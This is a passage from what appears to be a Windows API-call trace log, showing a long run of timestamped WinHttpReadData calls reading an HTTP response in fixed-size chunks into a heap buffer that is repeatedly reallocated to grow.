lpBuffer=0x6fbd040*, lpdwNumberOfBytesRead=0x75df598*=0x2800) returned 1 [0212.783] RtlReAllocateHeap (Heap=0x97d0000, Flags=0x8, Ptr=0x6db0040, Size=0x212000) returned 0x7310040 [0212.836] WinHttpReadData (in: hRequest=0x3eeadd0, lpBuffer=0x751f840, dwNumberOfBytesToRead=0x2800, lpdwNumberOfBytesRead=0x75df598 | out: lpBuffer=0x751f840*, lpdwNumberOfBytesRead=0x75df598*=0x2800) returned 1 [0212.906] RtlReAllocateHeap (Heap=0x97d0000, Flags=0x8, Ptr=0x7310040, Size=0x214800) returned 0x6db0040 [0212.944] WinHttpReadData (in: hRequest=0x3eeadd0, lpBuffer=0x6fc2040, dwNumberOfBytesToRead=0x2800, lpdwNumberOfBytesRead=0x75df598 | out: lpBuffer=0x6fc2040*, lpdwNumberOfBytesRead=0x75df598*=0x2800) returned 1 [0212.976] RtlReAllocateHeap (Heap=0x97d0000, Flags=0x8, Ptr=0x6db0040, Size=0x217000) returned 0x7310040 [0213.119] WinHttpReadData (in: hRequest=0x3eeadd0, lpBuffer=0x7524840, dwNumberOfBytesToRead=0x2800, lpdwNumberOfBytesRead=0x75df598 | out: lpBuffer=0x7524840*, lpdwNumberOfBytesRead=0x75df598*=0x2800) returned 1 [0213.155] RtlReAllocateHeap (Heap=0x97d0000, Flags=0x8, Ptr=0x7310040, Size=0x219800) returned 0x6db0040 [0213.193] WinHttpReadData (in: hRequest=0x3eeadd0, lpBuffer=0x6fc7040, dwNumberOfBytesToRead=0x2800, lpdwNumberOfBytesRead=0x75df598 | out: lpBuffer=0x6fc7040*, lpdwNumberOfBytesRead=0x75df598*=0x2800) returned 1 [0213.227] RtlReAllocateHeap (Heap=0x97d0000, Flags=0x8, Ptr=0x6db0040, Size=0x21c000) returned 0x7310040 [0213.262] WinHttpReadData (in: hRequest=0x3eeadd0, lpBuffer=0x7529840, dwNumberOfBytesToRead=0x2800, lpdwNumberOfBytesRead=0x75df598 | out: lpBuffer=0x7529840*, lpdwNumberOfBytesRead=0x75df598*=0x2800) returned 1 [0213.380] RtlReAllocateHeap (Heap=0x97d0000, Flags=0x8, Ptr=0x7310040, Size=0x21e800) returned 0x6db0040 [0213.416] WinHttpReadData (in: hRequest=0x3eeadd0, lpBuffer=0x6fcc040, dwNumberOfBytesToRead=0x2800, lpdwNumberOfBytesRead=0x75df598 | out: lpBuffer=0x6fcc040*, lpdwNumberOfBytesRead=0x75df598*=0x2800) returned 1 [0213.481] RtlReAllocateHeap (Heap=0x97d0000, Flags=0x8, Ptr=0x6db0040, Size=0x221000) returned 0x7310040 [0213.643] WinHttpReadData (in: hRequest=0x3eeadd0, lpBuffer=0x752e840, dwNumberOfBytesToRead=0x2800, lpdwNumberOfBytesRead=0x75df598 | out: lpBuffer=0x752e840*, lpdwNumberOfBytesRead=0x75df598*=0x2800) returned 1 [0213.725] RtlReAllocateHeap (Heap=0x97d0000, Flags=0x8, Ptr=0x7310040, Size=0x223800) returned 0x6db0040 [0213.925] WinHttpReadData (in: hRequest=0x3eeadd0, lpBuffer=0x6fd1040, dwNumberOfBytesToRead=0x2800, lpdwNumberOfBytesRead=0x75df598 | out: lpBuffer=0x6fd1040*, lpdwNumberOfBytesRead=0x75df598*=0x2800) returned 1 [0213.974] RtlReAllocateHeap (Heap=0x97d0000, Flags=0x8, Ptr=0x6db0040, Size=0x226000) returned 0x7310040 [0214.102] WinHttpReadData (in: hRequest=0x3eeadd0, lpBuffer=0x7533840, dwNumberOfBytesToRead=0x2800, lpdwNumberOfBytesRead=0x75df598 | out: lpBuffer=0x7533840*, lpdwNumberOfBytesRead=0x75df598*=0x2800) returned 1 [0214.197] RtlReAllocateHeap (Heap=0x97d0000, Flags=0x8, Ptr=0x7310040, Size=0x228800) returned 0x6db0040 [0214.322] WinHttpReadData (in: hRequest=0x3eeadd0, lpBuffer=0x6fd6040, dwNumberOfBytesToRead=0x2800, lpdwNumberOfBytesRead=0x75df598 | out: lpBuffer=0x6fd6040*, lpdwNumberOfBytesRead=0x75df598*=0x2800) returned 1 [0214.324] RtlReAllocateHeap (Heap=0x97d0000, Flags=0x8, Ptr=0x6db0040, Size=0x22b000) returned 0x7310040 [0214.507] WinHttpReadData (in: hRequest=0x3eeadd0, lpBuffer=0x7538840, dwNumberOfBytesToRead=0x2800, lpdwNumberOfBytesRead=0x75df598 | out: lpBuffer=0x7538840*, lpdwNumberOfBytesRead=0x75df598*=0x2800) returned 1 [0214.549] RtlReAllocateHeap (Heap=0x97d0000, Flags=0x8, Ptr=0x7310040, Size=0x22d800) returned 0x6db0040 [0214.587] WinHttpReadData (in: hRequest=0x3eeadd0, lpBuffer=0x6fdb040, dwNumberOfBytesToRead=0x2800, lpdwNumberOfBytesRead=0x75df598 | out: lpBuffer=0x6fdb040*, lpdwNumberOfBytesRead=0x75df598*=0x2800) returned 1 [0214.645] RtlReAllocateHeap (Heap=0x97d0000, Flags=0x8, Ptr=0x6db0040, Size=0x230000) returned 0x7310040 [0214.680] WinHttpReadData (in: hRequest=0x3eeadd0, lpBuffer=0x753d840, dwNumberOfBytesToRead=0x2800, lpdwNumberOfBytesRead=0x75df598 | out: lpBuffer=0x753d840*, lpdwNumberOfBytesRead=0x75df598*=0x2800) returned 1 [0214.686] RtlReAllocateHeap (Heap=0x97d0000, Flags=0x8, Ptr=0x7310040, Size=0x232800) returned 0x6db0040 [0214.723] WinHttpReadData (in: hRequest=0x3eeadd0, lpBuffer=0x6fe0040, dwNumberOfBytesToRead=0x2800, lpdwNumberOfBytesRead=0x75df598 | out: lpBuffer=0x6fe0040*, lpdwNumberOfBytesRead=0x75df598*=0x2800) returned 1 [0214.793] RtlReAllocateHeap (Heap=0x97d0000, Flags=0x8, Ptr=0x6db0040, Size=0x235000) returned 0x7310040 [0214.852] WinHttpReadData (in: hRequest=0x3eeadd0, lpBuffer=0x7542840, dwNumberOfBytesToRead=0x2800, lpdwNumberOfBytesRead=0x75df598 | out: lpBuffer=0x7542840*, lpdwNumberOfBytesRead=0x75df598*=0x2800) returned 1 [0214.914] RtlReAllocateHeap (Heap=0x97d0000, Flags=0x8, Ptr=0x7310040, Size=0x237800) returned 0x6db0040 [0214.957] WinHttpReadData (in: hRequest=0x3eeadd0, lpBuffer=0x6fe5040, dwNumberOfBytesToRead=0x2800, lpdwNumberOfBytesRead=0x75df598 | out: lpBuffer=0x6fe5040*, lpdwNumberOfBytesRead=0x75df598*=0x2800) returned 1 [0214.987] RtlReAllocateHeap (Heap=0x97d0000, Flags=0x8, Ptr=0x6db0040, Size=0x23a000) returned 0x7310040 [0215.022] WinHttpReadData (in: hRequest=0x3eeadd0, lpBuffer=0x7547840, dwNumberOfBytesToRead=0x2800, lpdwNumberOfBytesRead=0x75df598 | out: lpBuffer=0x7547840*, lpdwNumberOfBytesRead=0x75df598*=0x2800) returned 1 [0215.057] RtlReAllocateHeap (Heap=0x97d0000, Flags=0x8, Ptr=0x7310040, Size=0x23c800) returned 0x6db0040 [0215.094] WinHttpReadData (in: hRequest=0x3eeadd0, lpBuffer=0x6fea040, dwNumberOfBytesToRead=0x2800, lpdwNumberOfBytesRead=0x75df598 | out: lpBuffer=0x6fea040*, lpdwNumberOfBytesRead=0x75df598*=0x2800) returned 1 [0215.131] RtlReAllocateHeap (Heap=0x97d0000, Flags=0x8, Ptr=0x6db0040, Size=0x23f000) returned 0x7310040 [0215.313] WinHttpReadData (in: hRequest=0x3eeadd0, lpBuffer=0x754c840, dwNumberOfBytesToRead=0x2800, lpdwNumberOfBytesRead=0x75df598 | out: lpBuffer=0x754c840*, lpdwNumberOfBytesRead=0x75df598*=0x2800) returned 1 [0215.338] RtlReAllocateHeap (Heap=0x97d0000, Flags=0x8, Ptr=0x7310040, Size=0x241800) returned 0x6db0040 [0215.378] WinHttpReadData (in: hRequest=0x3eeadd0, lpBuffer=0x6fef040, dwNumberOfBytesToRead=0x2800, lpdwNumberOfBytesRead=0x75df598 | out: lpBuffer=0x6fef040*, lpdwNumberOfBytesRead=0x75df598*=0x2800) returned 1 [0215.401] RtlReAllocateHeap (Heap=0x97d0000, Flags=0x8, Ptr=0x6db0040, Size=0x244000) returned 0x7310040 [0215.802] WinHttpReadData (in: hRequest=0x3eeadd0, lpBuffer=0x7551840, dwNumberOfBytesToRead=0x2800, lpdwNumberOfBytesRead=0x75df598 | out: lpBuffer=0x7551840*, lpdwNumberOfBytesRead=0x75df598*=0x2800) returned 1 [0215.811] RtlReAllocateHeap (Heap=0x97d0000, Flags=0x8, Ptr=0x7310040, Size=0x246800) returned 0x6db0040 [0215.850] WinHttpReadData (in: hRequest=0x3eeadd0, lpBuffer=0x6ff4040, dwNumberOfBytesToRead=0x2800, lpdwNumberOfBytesRead=0x75df598 | out: lpBuffer=0x6ff4040*, lpdwNumberOfBytesRead=0x75df598*=0x2800) returned 1 [0215.859] RtlReAllocateHeap (Heap=0x97d0000, Flags=0x8, Ptr=0x6db0040, Size=0x249000) returned 0x7310040 [0216.036] WinHttpReadData (in: hRequest=0x3eeadd0, lpBuffer=0x7556840, dwNumberOfBytesToRead=0x2800, lpdwNumberOfBytesRead=0x75df598 | out: lpBuffer=0x7556840*, lpdwNumberOfBytesRead=0x75df598*=0x2800) returned 1 [0216.058] RtlReAllocateHeap (Heap=0x97d0000, Flags=0x8, Ptr=0x7310040, Size=0x24b800) returned 0x6db0040 [0216.095] WinHttpReadData (in: hRequest=0x3eeadd0, lpBuffer=0x6ff9040, dwNumberOfBytesToRead=0x2800, lpdwNumberOfBytesRead=0x75df598 | out: lpBuffer=0x6ff9040*, lpdwNumberOfBytesRead=0x75df598*=0x2800) returned 1 [0216.097] RtlReAllocateHeap (Heap=0x97d0000, Flags=0x8, Ptr=0x6db0040, Size=0x24e000) returned 0x7310040 [0216.138] WinHttpReadData (in: hRequest=0x3eeadd0, lpBuffer=0x755b840, dwNumberOfBytesToRead=0x2800, lpdwNumberOfBytesRead=0x75df598 | out: lpBuffer=0x755b840*, lpdwNumberOfBytesRead=0x75df598*=0x2800) returned 1 [0216.156] RtlReAllocateHeap (Heap=0x97d0000, Flags=0x8, Ptr=0x7310040, Size=0x250800) returned 0x6db0040 [0216.244] WinHttpReadData (in: hRequest=0x3eeadd0, lpBuffer=0x6ffe040, dwNumberOfBytesToRead=0x2800, lpdwNumberOfBytesRead=0x75df598 | out: lpBuffer=0x6ffe040*, lpdwNumberOfBytesRead=0x75df598*=0x2800) returned 1 [0216.548] RtlReAllocateHeap (Heap=0x97d0000, Flags=0x8, Ptr=0x6db0040, Size=0x253000) returned 0x9c80040 [0216.593] WinHttpReadData (in: hRequest=0x3eeadd0, lpBuffer=0x9ed0840, dwNumberOfBytesToRead=0x2800, lpdwNumberOfBytesRead=0x75df598 | out: lpBuffer=0x9ed0840*, lpdwNumberOfBytesRead=0x75df598*=0x2800) returned 1 [0216.610] RtlReAllocateHeap (Heap=0x97d0000, Flags=0x8, Ptr=0x9c80040, Size=0x255800) returned 0x6db0040 [0216.649] WinHttpReadData (in: hRequest=0x3eeadd0, lpBuffer=0x7003040, dwNumberOfBytesToRead=0x2800, lpdwNumberOfBytesRead=0x75df598 | out: lpBuffer=0x7003040*, lpdwNumberOfBytesRead=0x75df598*=0x2800) returned 1 [0217.099] RtlReAllocateHeap (Heap=0x97d0000, Flags=0x8, Ptr=0x6db0040, Size=0x258000) returned 0x9c80040 [0217.139] WinHttpReadData (in: hRequest=0x3eeadd0, lpBuffer=0x9ed5840, dwNumberOfBytesToRead=0x2800, lpdwNumberOfBytesRead=0x75df598 | out: lpBuffer=0x9ed5840*, lpdwNumberOfBytesRead=0x75df598*=0x2800) returned 1 [0217.427] RtlReAllocateHeap (Heap=0x97d0000, Flags=0x8, Ptr=0x9c80040, Size=0x25a800) returned 0x6db0040 [0217.507] WinHttpReadData (in: hRequest=0x3eeadd0, lpBuffer=0x7008040, dwNumberOfBytesToRead=0x2800, lpdwNumberOfBytesRead=0x75df598 | out: lpBuffer=0x7008040*, lpdwNumberOfBytesRead=0x75df598*=0x2800) returned 1 [0217.523] RtlReAllocateHeap (Heap=0x97d0000, Flags=0x8, Ptr=0x6db0040, Size=0x25d000) returned 0x9c80040 [0217.562] WinHttpReadData (in: hRequest=0x3eeadd0, lpBuffer=0x9eda840, dwNumberOfBytesToRead=0x2800, lpdwNumberOfBytesRead=0x75df598 | out: lpBuffer=0x9eda840*, lpdwNumberOfBytesRead=0x75df598*=0x2800) returned 1 [0217.577] RtlReAllocateHeap (Heap=0x97d0000, Flags=0x8, Ptr=0x9c80040, Size=0x25f800) returned 0x6db0040 [0217.649] WinHttpReadData (in: hRequest=0x3eeadd0, lpBuffer=0x700d040, dwNumberOfBytesToRead=0x2800, lpdwNumberOfBytesRead=0x75df598 | out: lpBuffer=0x700d040*, lpdwNumberOfBytesRead=0x75df598*=0x2800) returned 1 [0217.705] RtlReAllocateHeap (Heap=0x97d0000, Flags=0x8, Ptr=0x6db0040, Size=0x262000) returned 0x9c80040 [0217.774] WinHttpReadData (in: hRequest=0x3eeadd0, lpBuffer=0x9edf840, dwNumberOfBytesToRead=0x2800, lpdwNumberOfBytesRead=0x75df598 | out: lpBuffer=0x9edf840*, lpdwNumberOfBytesRead=0x75df598*=0x2800) returned 1 [0217.787] RtlReAllocateHeap (Heap=0x97d0000, Flags=0x8, Ptr=0x9c80040, Size=0x264800) returned 0x9ef0040 [0218.106] WinHttpReadData (in: hRequest=0x3eeadd0, lpBuffer=0xa152040, dwNumberOfBytesToRead=0x2800, lpdwNumberOfBytesRead=0x75df598 | out: lpBuffer=0xa152040*, lpdwNumberOfBytesRead=0x75df598*=0x2800) returned 1 [0218.107] RtlReAllocateHeap (Heap=0x97d0000, Flags=0x8, Ptr=0x9ef0040, Size=0x267000) returned 0x9c80040 [0218.208] WinHttpReadData (in: hRequest=0x3eeadd0, lpBuffer=0x9ee4840, dwNumberOfBytesToRead=0x2800, lpdwNumberOfBytesRead=0x75df598 | out: lpBuffer=0x9ee4840*, lpdwNumberOfBytesRead=0x75df598*=0x2800) returned 1 [0218.246] RtlReAllocateHeap (Heap=0x97d0000, Flags=0x8, Ptr=0x9c80040, Size=0x269800) returned 0x9ef0040 [0218.732] WinHttpReadData (in: hRequest=0x3eeadd0, lpBuffer=0xa157040, dwNumberOfBytesToRead=0x2800, lpdwNumberOfBytesRead=0x75df598 | out: lpBuffer=0xa157040*, lpdwNumberOfBytesRead=0x75df598*=0x2800) returned 1 [0218.738] RtlReAllocateHeap (Heap=0x97d0000, Flags=0x8, Ptr=0x9ef0040, Size=0x26c000) returned 0x9c80040 [0218.818] WinHttpReadData (in: hRequest=0x3eeadd0, lpBuffer=0x9ee9840, dwNumberOfBytesToRead=0x2800, lpdwNumberOfBytesRead=0x75df598 | out: lpBuffer=0x9ee9840*, lpdwNumberOfBytesRead=0x75df598*=0x2800) returned 1 [0218.840] RtlReAllocateHeap (Heap=0x97d0000, Flags=0x8, Ptr=0x9c80040, Size=0x26e800) returned 0x9ef0040 [0218.899] WinHttpReadData (in: hRequest=0x3eeadd0, lpBuffer=0xa15c040, dwNumberOfBytesToRead=0x2800, lpdwNumberOfBytesRead=0x75df598 | out: lpBuffer=0xa15c040*, lpdwNumberOfBytesRead=0x75df598*=0x2800) returned 1 [0218.911] RtlReAllocateHeap (Heap=0x97d0000, Flags=0x8, Ptr=0x9ef0040, Size=0x271000) returned 0xa160040 [0218.955] WinHttpReadData (in: hRequest=0x3eeadd0, lpBuffer=0xa3ce840, dwNumberOfBytesToRead=0x2800, lpdwNumberOfBytesRead=0x75df598 | out: lpBuffer=0xa3ce840*, lpdwNumberOfBytesRead=0x75df598*=0x2800) returned 1 [0219.004] RtlReAllocateHeap (Heap=0x97d0000, Flags=0x8, Ptr=0xa160040, Size=0x273800) returned 0x9c80040 [0219.434] WinHttpReadData (in: hRequest=0x3eeadd0, lpBuffer=0x9ef1040, dwNumberOfBytesToRead=0x2800, lpdwNumberOfBytesRead=0x75df598 | out: lpBuffer=0x9ef1040*, lpdwNumberOfBytesRead=0x75df598*=0x2800) returned 1 [0219.435] RtlReAllocateHeap (Heap=0x97d0000, Flags=0x8, Ptr=0x9c80040, Size=0x276000) returned 0x9f00040 [0219.504] WinHttpReadData (in: hRequest=0x3eeadd0, lpBuffer=0xa173840, dwNumberOfBytesToRead=0x2800, lpdwNumberOfBytesRead=0x75df598 | out: lpBuffer=0xa173840*, lpdwNumberOfBytesRead=0x75df598*=0x2800) returned 1 [0219.521] RtlReAllocateHeap (Heap=0x97d0000, Flags=0x8, Ptr=0x9f00040, Size=0x278800) returned 0x9c80040 [0219.644] WinHttpReadData (in: hRequest=0x3eeadd0, lpBuffer=0x9ef6040, dwNumberOfBytesToRead=0x2800, lpdwNumberOfBytesRead=0x75df598 | out: lpBuffer=0x9ef6040*, lpdwNumberOfBytesRead=0x75df598*=0x2800) returned 1 [0219.722] RtlReAllocateHeap (Heap=0x97d0000, Flags=0x8, Ptr=0x9c80040, Size=0x27b000) returned 0x9f00040 [0219.766] WinHttpReadData (in: hRequest=0x3eeadd0, lpBuffer=0xa178840, dwNumberOfBytesToRead=0x2800, lpdwNumberOfBytesRead=0x75df598 | out: lpBuffer=0xa178840*, lpdwNumberOfBytesRead=0x75df598*=0x2800) returned 1 [0219.810] RtlReAllocateHeap (Heap=0x97d0000, Flags=0x8, Ptr=0x9f00040, Size=0x27d800) returned 0x9c80040 [0219.895] WinHttpReadData (in: hRequest=0x3eeadd0, lpBuffer=0x9efb040, dwNumberOfBytesToRead=0x2800, lpdwNumberOfBytesRead=0x75df598 | out: lpBuffer=0x9efb040*, lpdwNumberOfBytesRead=0x75df598*=0x2800) returned 1 [0219.917] RtlReAllocateHeap (Heap=0x97d0000, Flags=0x8, Ptr=0x9c80040, Size=0x280000) returned 0x9f00040 [0219.984] WinHttpReadData (in: hRequest=0x3eeadd0, lpBuffer=0xa17d840, dwNumberOfBytesToRead=0x2800, lpdwNumberOfBytesRead=0x75df598 | out: lpBuffer=0xa17d840*, lpdwNumberOfBytesRead=0x75df598*=0x2800) returned 1 [0220.004] RtlReAllocateHeap (Heap=0x97d0000, Flags=0x8, Ptr=0x9f00040, Size=0x282800) returned 0xa190040 [0220.047] WinHttpReadData (in: hRequest=0x3eeadd0, lpBuffer=0xa410040, dwNumberOfBytesToRead=0x2800, lpdwNumberOfBytesRead=0x75df598 | out: lpBuffer=0xa410040*, lpdwNumberOfBytesRead=0x75df598*=0x2800) returned 1 [0220.127] RtlReAllocateHeap (Heap=0x97d0000, Flags=0x8, Ptr=0xa190040, Size=0x285000) returned 0x9c80040 [0220.325] WinHttpReadData (in: hRequest=0x3eeadd0, lpBuffer=0x9f02840, dwNumberOfBytesToRead=0x2800, lpdwNumberOfBytesRead=0x75df598 | out: lpBuffer=0x9f02840*, lpdwNumberOfBytesRead=0x75df598*=0x2800) returned 1 [0220.327] RtlReAllocateHeap (Heap=0x97d0000, Flags=0x8, Ptr=0x9c80040, Size=0x287800) returned 0x9f10040 [0220.387] WinHttpReadData (in: hRequest=0x3eeadd0, lpBuffer=0xa195040, dwNumberOfBytesToRead=0x2800, lpdwNumberOfBytesRead=0x75df598 | out: lpBuffer=0xa195040*, lpdwNumberOfBytesRead=0x75df598*=0x2800) returned 1 [0220.410] RtlReAllocateHeap (Heap=0x97d0000, Flags=0x8, Ptr=0x9f10040, Size=0x28a000) returned 0x9c80040 [0220.452] WinHttpReadData (in: hRequest=0x3eeadd0, lpBuffer=0x9f07840, dwNumberOfBytesToRead=0x2800, lpdwNumberOfBytesRead=0x75df598 | out: lpBuffer=0x9f07840*, lpdwNumberOfBytesRead=0x75df598*=0x2800) returned 1 [0220.825] RtlReAllocateHeap (Heap=0x97d0000, Flags=0x8, Ptr=0x9c80040, Size=0x28c800) returned 0x9f10040 [0220.899] WinHttpReadData (in: hRequest=0x3eeadd0, lpBuffer=0xa19a040, dwNumberOfBytesToRead=0x2800, lpdwNumberOfBytesRead=0x75df598 | out: lpBuffer=0xa19a040*, lpdwNumberOfBytesRead=0x75df598*=0x2800) returned 1 [0220.933] RtlReAllocateHeap (Heap=0x97d0000, Flags=0x8, Ptr=0x9f10040, Size=0x28f000) returned 0x9c80040 [0220.984] WinHttpReadData (in: hRequest=0x3eeadd0, lpBuffer=0x9f0c840, dwNumberOfBytesToRead=0x2800, lpdwNumberOfBytesRead=0x75df598 | out: lpBuffer=0x9f0c840*, lpdwNumberOfBytesRead=0x75df598*=0x2800) returned 1 [0221.123] RtlReAllocateHeap (Heap=0x97d0000, Flags=0x8, Ptr=0x9c80040, Size=0x291800) returned 0x9f10040 [0221.268] WinHttpReadData (in: hRequest=0x3eeadd0, lpBuffer=0xa19f040, dwNumberOfBytesToRead=0x2800, lpdwNumberOfBytesRead=0x75df598 | out: lpBuffer=0xa19f040*, lpdwNumberOfBytesRead=0x75df598*=0x2800) returned 1 [0221.295] RtlReAllocateHeap (Heap=0x97d0000, Flags=0x8, Ptr=0x9f10040, Size=0x294000) returned 0xa1b0040 [0221.346] WinHttpReadData (in: hRequest=0x3eeadd0, lpBuffer=0xa441840, dwNumberOfBytesToRead=0x2800, lpdwNumberOfBytesRead=0x75df598 | out: lpBuffer=0xa441840*, lpdwNumberOfBytesRead=0x75df598*=0x2800) returned 1 [0221.407] RtlReAllocateHeap (Heap=0x97d0000, Flags=0x8, Ptr=0xa1b0040, Size=0x296800) returned 0x9c80040 [0221.502] WinHttpReadData (in: hRequest=0x3eeadd0, lpBuffer=0x9f14040, dwNumberOfBytesToRead=0x2800, lpdwNumberOfBytesRead=0x75df598 | out: lpBuffer=0x9f14040*, lpdwNumberOfBytesRead=0x75df598*=0x2800) returned 1 [0221.580] RtlReAllocateHeap (Heap=0x97d0000, Flags=0x8, Ptr=0x9c80040, Size=0x299000) returned 0x9f20040 [0221.622] WinHttpReadData (in: hRequest=0x3eeadd0, lpBuffer=0xa1b6840, dwNumberOfBytesToRead=0x2800, lpdwNumberOfBytesRead=0x75df598 | out: lpBuffer=0xa1b6840*, lpdwNumberOfBytesRead=0x75df598*=0x2800) returned 1 [0221.625] RtlReAllocateHeap (Heap=0x97d0000, Flags=0x8, Ptr=0x9f20040, Size=0x29b800) returned 0x9c80040 [0221.668] WinHttpReadData (in: hRequest=0x3eeadd0, lpBuffer=0x9f19040, dwNumberOfBytesToRead=0x2800, lpdwNumberOfBytesRead=0x75df598 | out: lpBuffer=0x9f19040*, lpdwNumberOfBytesRead=0x75df598*=0x2800) returned 1 [0221.690] RtlReAllocateHeap (Heap=0x97d0000, Flags=0x8, Ptr=0x9c80040, Size=0x29e000) returned 0x9f20040 [0223.022] WinHttpReadData (in: hRequest=0x3eeadd0, lpBuffer=0xa1bb840, dwNumberOfBytesToRead=0x2800, lpdwNumberOfBytesRead=0x75df598 | out: lpBuffer=0xa1bb840*, lpdwNumberOfBytesRead=0x75df598*=0x2800) returned 1 [0223.054] RtlReAllocateHeap (Heap=0x97d0000, Flags=0x8, Ptr=0x9f20040, Size=0x2a0800) returned 0xa1c0040 [0223.105] WinHttpReadData (in: hRequest=0x3eeadd0, lpBuffer=0xa45e040, dwNumberOfBytesToRead=0x2800, lpdwNumberOfBytesRead=0x75df598 | out: lpBuffer=0xa45e040*, lpdwNumberOfBytesRead=0x75df598*=0x2800) returned 1 [0223.106] RtlReAllocateHeap (Heap=0x97d0000, Flags=0x8, Ptr=0xa1c0040, Size=0x2a3000) returned 0x9c80040 [0223.167] WinHttpReadData (in: hRequest=0x3eeadd0, lpBuffer=0x9f20840, dwNumberOfBytesToRead=0x2800, lpdwNumberOfBytesRead=0x75df598 | out: lpBuffer=0x9f20840*, lpdwNumberOfBytesRead=0x75df598*=0x2800) returned 1 [0223.202] RtlReAllocateHeap (Heap=0x97d0000, Flags=0x8, Ptr=0x9c80040, Size=0x2a5800) returned 0x9f30040 [0223.403] WinHttpReadData (in: hRequest=0x3eeadd0, lpBuffer=0xa1d3040, dwNumberOfBytesToRead=0x2800, lpdwNumberOfBytesRead=0x75df598 | out: lpBuffer=0xa1d3040*, lpdwNumberOfBytesRead=0x75df598*=0x2800) returned 1 [0223.404] RtlReAllocateHeap (Heap=0x97d0000, Flags=0x8, Ptr=0x9f30040, Size=0x2a8000) returned 0x9c80040 [0223.466] WinHttpReadData (in: hRequest=0x3eeadd0, lpBuffer=0x9f25840, dwNumberOfBytesToRead=0x2800, lpdwNumberOfBytesRead=0x75df598 | out: lpBuffer=0x9f25840*, lpdwNumberOfBytesRead=0x75df598*=0x2800) returned 1 [0223.927] RtlReAllocateHeap (Heap=0x97d0000, Flags=0x8, Ptr=0x9c80040, Size=0x2aa800) returned 0x9f30040 [0224.060] WinHttpReadData (in: hRequest=0x3eeadd0, lpBuffer=0xa1d8040, dwNumberOfBytesToRead=0x2800, lpdwNumberOfBytesRead=0x75df598 | out: lpBuffer=0xa1d8040*, lpdwNumberOfBytesRead=0x75df598*=0x2800) returned 1 [0224.115] RtlReAllocateHeap (Heap=0x97d0000, Flags=0x8, Ptr=0x9f30040, Size=0x2ad000) returned 0x9c80040 [0224.162] WinHttpReadData (in: hRequest=0x3eeadd0, lpBuffer=0x9f2a840, dwNumberOfBytesToRead=0x2800, lpdwNumberOfBytesRead=0x75df598 | out: lpBuffer=0x9f2a840*, lpdwNumberOfBytesRead=0x75df598*=0x2800) returned 1 [0224.163] RtlReAllocateHeap (Heap=0x97d0000, Flags=0x8, Ptr=0x9c80040, Size=0x2af800) returned 0x9f30040 [0224.211] WinHttpReadData (in: hRequest=0x3eeadd0, lpBuffer=0xa1dd040, dwNumberOfBytesToRead=0x2800, lpdwNumberOfBytesRead=0x75df598 | out: lpBuffer=0xa1dd040*, lpdwNumberOfBytesRead=0x75df598*=0x2800) returned 1 [0224.634] RtlReAllocateHeap (Heap=0x97d0000, Flags=0x8, Ptr=0x9f30040, Size=0x2b2000) returned 0xa1e0040 [0224.728] WinHttpReadData (in: hRequest=0x3eeadd0, lpBuffer=0xa48f840, dwNumberOfBytesToRead=0x2800, lpdwNumberOfBytesRead=0x75df598 | out: lpBuffer=0xa48f840*, lpdwNumberOfBytesRead=0x75df598*=0x2800) returned 1 [0224.769] RtlReAllocateHeap (Heap=0x97d0000, Flags=0x8, Ptr=0xa1e0040, Size=0x2b4800) returned 0x9c80040 [0224.847] WinHttpReadData (in: hRequest=0x3eeadd0, lpBuffer=0x9f32040, dwNumberOfBytesToRead=0x2800, lpdwNumberOfBytesRead=0x75df598 | out: lpBuffer=0x9f32040*, lpdwNumberOfBytesRead=0x75df598*=0x2800) returned 1 [0224.879] RtlReAllocateHeap (Heap=0x97d0000, Flags=0x8, Ptr=0x9c80040, Size=0x2b7000) returned 0x9f40040 [0224.964] WinHttpReadData (in: hRequest=0x3eeadd0, lpBuffer=0xa1f4840, dwNumberOfBytesToRead=0x2800, lpdwNumberOfBytesRead=0x75df598 | out: lpBuffer=0xa1f4840*, lpdwNumberOfBytesRead=0x75df598*=0x2800) returned 1 [0224.986] RtlReAllocateHeap (Heap=0x97d0000, Flags=0x8, Ptr=0x9f40040, Size=0x2b9800) returned 0x9c80040 [0225.059] WinHttpReadData (in: hRequest=0x3eeadd0, lpBuffer=0x9f37040, dwNumberOfBytesToRead=0x2800, lpdwNumberOfBytesRead=0x75df598 | out: lpBuffer=0x9f37040*, lpdwNumberOfBytesRead=0x75df598*=0x2800) returned 1 [0225.075] RtlReAllocateHeap (Heap=0x97d0000, Flags=0x8, Ptr=0x9c80040, Size=0x2bc000) returned 0x9f40040 [0225.359] WinHttpReadData (in: hRequest=0x3eeadd0, lpBuffer=0xa1f9840, dwNumberOfBytesToRead=0x2800, lpdwNumberOfBytesRead=0x75df598 | out: lpBuffer=0xa1f9840*, lpdwNumberOfBytesRead=0x75df598*=0x2800) returned 1 [0225.377] RtlReAllocateHeap (Heap=0x97d0000, Flags=0x8, Ptr=0x9f40040, Size=0x2be800) returned 0x9c80040 [0225.459] WinHttpReadData (in: hRequest=0x3eeadd0, lpBuffer=0x9f3c040, dwNumberOfBytesToRead=0x2800, lpdwNumberOfBytesRead=0x75df598 | out: lpBuffer=0x9f3c040*, lpdwNumberOfBytesRead=0x75df598*=0x2800) returned 1 [0225.542] RtlReAllocateHeap (Heap=0x97d0000, Flags=0x8, Ptr=0x9c80040, Size=0x2c1000) returned 0x9f40040 [0225.697] WinHttpReadData (in: hRequest=0x3eeadd0, lpBuffer=0xa1fe840, dwNumberOfBytesToRead=0x2800, lpdwNumberOfBytesRead=0x75df598 | out: lpBuffer=0xa1fe840*, lpdwNumberOfBytesRead=0x75df598*=0x2800) returned 1 [0225.697] RtlReAllocateHeap (Heap=0x97d0000, Flags=0x8, Ptr=0x9f40040, Size=0x2c3800) returned 0xa210040 [0225.801] WinHttpReadData (in: hRequest=0x3eeadd0, lpBuffer=0xa4d1040, dwNumberOfBytesToRead=0x2800, lpdwNumberOfBytesRead=0x75df598 | out: lpBuffer=0xa4d1040*, lpdwNumberOfBytesRead=0x75df598*=0x2800) returned 1 [0225.875] RtlReAllocateHeap (Heap=0x97d0000, Flags=0x8, Ptr=0xa210040, Size=0x2c6000) returned 0x9c80040 [0226.046] WinHttpReadData (in: hRequest=0x3eeadd0, lpBuffer=0x9f43840, dwNumberOfBytesToRead=0x2800, lpdwNumberOfBytesRead=0x75df598 | out: lpBuffer=0x9f43840*, lpdwNumberOfBytesRead=0x75df598*=0x2800) returned 1 [0226.094] RtlReAllocateHeap (Heap=0x97d0000, Flags=0x8, Ptr=0x9c80040, Size=0x2c8800) returned 0x9f50040 [0226.186] WinHttpReadData (in: hRequest=0x3eeadd0, lpBuffer=0xa216040, dwNumberOfBytesToRead=0x2800, lpdwNumberOfBytesRead=0x75df598 | out: 